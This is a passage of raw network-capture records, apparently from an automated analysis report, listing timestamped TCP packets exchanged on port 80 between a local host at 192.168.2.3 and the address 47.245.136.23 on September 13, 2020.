Sep 13, 2020 20:55:12.642426968 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.642432928 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.642438889 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.642446041 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.642463923 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.642476082 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:12.642494917 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.642544031 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.642565012 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.642579079 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.642590046 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.642601013 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.642611027 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.642622948 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.642632961 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.642642021 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.642651081 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.642659903 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.642668009 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.642677069 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.642688036 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.642697096 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.642704964 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.642714024 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.642723083 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.642730951 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.642740011 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.642748117 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.642755985 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.642818928 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:12.642827988 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:12.644004107 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.644026041 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.644049883 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.644064903 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.644083977 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.644105911 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.644129992 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.644150019 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.644150972 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:12.644186974 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.644210100 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.644260883 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.644299984 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.644331932 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.644367933 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.644401073 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.644416094 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.644427061 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.644454956 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:12.644464970 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:12.644500017 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.644535065 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.644571066 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.644617081 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.644635916 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.644663095 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.644701958 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.644731045 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.644759893 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:12.644767046 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:12.644810915 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.644865990 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.644917965 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.644920111 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:12.644927979 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:12.644979954 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.645051956 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.645097017 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:12.645102978 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:12.645131111 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.645200014 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.645256042 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.645282984 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:12.645288944 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:12.645323038 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.645343065 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.645359993 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.645379066 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.645397902 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.645412922 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.645431042 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.645447969 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.645464897 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.645482063 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.645497084 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.645514965 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.645518064 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:12.645525932 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:12.645534039 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.645549059 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.645565987 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.645584106 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.645601988 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.645613909 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.645623922 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.645632029 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.645641088 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.645652056 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.645668983 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.645689011 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.645704031 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.645721912 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.645739079 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.645757914 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.645776987 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.645797014 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.645816088 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.645836115 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.645836115 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:12.645844936 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:12.645854950 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.645872116 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.645889997 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.645909071 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.645927906 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.645947933 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.645967007 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.645986080 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.646004915 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.646024942 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.646044016 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.646063089 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.646081924 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.646101952 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.646121025 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.646140099 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.646155119 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:12.646158934 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.646162987 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:12.646177053 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.646194935 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.646214008 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.646233082 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.646251917 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.646306992 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.646327019 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.646354914 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.646375895 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.646394968 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.646414042 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.646434069 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.646452904 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.646471977 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.646491051 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.646491051 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:12.646500111 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:12.646511078 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.646528006 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.646548986 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.646568060 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.646588087 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.646606922 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.646625996 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.646720886 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:12.646727085 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:12.668761015 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:12.670762062 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:12.692851067 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.692871094 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.692888975 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.692907095 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.692923069 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.692939997 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.692956924 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.692974091 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.692992926 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.693022966 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:12.693123102 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:12.694353104 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.694436073 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:12.694561005 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.694607019 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.694644928 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.694655895 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:12.694694042 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.694741964 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.694772959 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:12.694796085 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.694830894 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.694852114 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.694880962 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.694886923 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:12.694928885 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.694967985 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.695023060 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:12.695030928 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.695060015 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.695094109 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.695117950 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:12.695163965 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.695200920 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:12.695234060 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.695292950 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.695341110 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:12.695374966 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.695410013 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.695437908 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.695492983 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:12.695506096 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.695535898 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.695571899 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.695601940 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.695607901 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:12.695646048 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.695668936 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.695686102 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.695705891 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.695740938 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.695754051 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:12.695766926 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.695796967 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.695826054 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.695861101 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.695875883 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:12.695892096 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.695914984 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.695950985 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.695981026 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.696003914 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.696017981 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:12.696038961 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.696113110 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.696114063 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:12.696185112 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.696207047 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:12.696269989 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.696316957 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:12.696351051 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.696397066 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.696400881 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:12.696425915 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.696463108 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.696496964 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.696510077 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:12.696521997 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.696551085 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.696625948 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.696640015 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:12.696707010 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.696736097 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:12.696768999 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.696819067 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.696836948 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.696865082 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.696876049 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:12.696882010 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.696898937 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.696918011 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.696937084 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.696954966 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.696974039 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.696985006 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.697001934 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.697020054 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.697038889 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.697055101 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:12.697058916 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.697076082 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.697092056 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.697110891 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.697129011 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.697148085 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.697165966 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.697184086 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.697202921 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.697221041 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.697228909 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:12.697238922 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.697256088 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.697272062 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.697290897 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.697318077 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.697335958 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.697354078 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.697371006 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.697384119 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.697397947 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.697415113 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.697432041 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.697448969 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.697457075 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:12.697463036 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.697472095 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.697487116 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.697504997 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.697521925 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.697541952 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.697559118 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.697577953 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.697593927 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.697613001 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.697637081 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.697645903 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:12.697654009 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.697670937 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.697685957 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.697704077 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.697722912 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.697740078 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.697758913 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.697776079 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.697794914 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.697823048 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.697843075 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:12.697851896 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.697880030 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.697906971 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.697925091 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.697942972 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.697959900 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.697978020 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.697993994 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.698013067 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.698029041 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.698040009 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.698050976 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.698057890 CEST	49723	80	192.168.2.3	47.245.136.23
Sep 13, 2020 20:55:12.698060989 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.698071003 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.698081017 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.698091984 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.698101997 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.698112011 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.698131084 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.698147058 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.698165894 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.698182106 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.698199987 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.698215008 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.698225021 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.698241949 CEST	80	49723	47.245.136.23	192.168.2.3
Sep 13, 2020 20:55:12.698256969 CEST	80	49723	47.245.136.23	192.168.2.3
